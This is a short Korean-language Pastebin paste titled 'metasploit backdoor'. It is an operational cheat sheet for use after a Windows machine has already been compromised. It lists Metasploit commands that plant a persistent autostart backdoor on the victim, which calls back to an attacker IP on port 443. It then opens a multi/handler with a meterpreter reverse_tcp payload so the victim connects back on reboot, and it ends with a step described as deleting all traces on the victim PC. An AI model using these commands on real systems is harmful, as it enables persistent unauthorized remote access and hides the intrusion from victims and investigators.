Advertisement
zmnkh

metasploit backdoor

Mar 24th, 2015
534
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.80 KB | None | 0 0
  1. 자동 백도어
  2.  
  3. #공격 성공 후 (권한 획득 후)
  4. #도움말
  5. run persistence -h
  6.  
  7. #공격자의 시스템으로 접근
  8. run persisence -X -L c:\\ -i 10 -p 443 -r 192.168.182.151
  9. -X 자동 백도어
  10. -L c:\\ 악성코드가 심겨질 위치 (피해자)
  11. -i 10 인터벌
  12. -p 443 포트 (공격자)
  13. -r IP 공격자 IP (공격자)
  14.  
  15. 상기 공격을 수행한 뒤 아래와 같이 handler를 오픈하여, 피해자 PC가 접속할 수 있도록 port를 열어 놓는다.
  16.  
  17. #멀티핸들러
  18. use multi/handler
  19. set payload windows/meterpreter/reverse_tcp
  20. set lhost 192.168.182.151
  21. set lport 443
  22. exploit
  23.  
  24. ((피해자 PC 재부팅 되면 공격자의 PC로 접속한다)
  25.  
  26.  
  27. #흔적 지우기
  28. resource /root/.msf4/logs/persistence/Y~~~~/xxxxx.rc
  29. 피해자 PC의 흔적을 모두 삭제한다.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement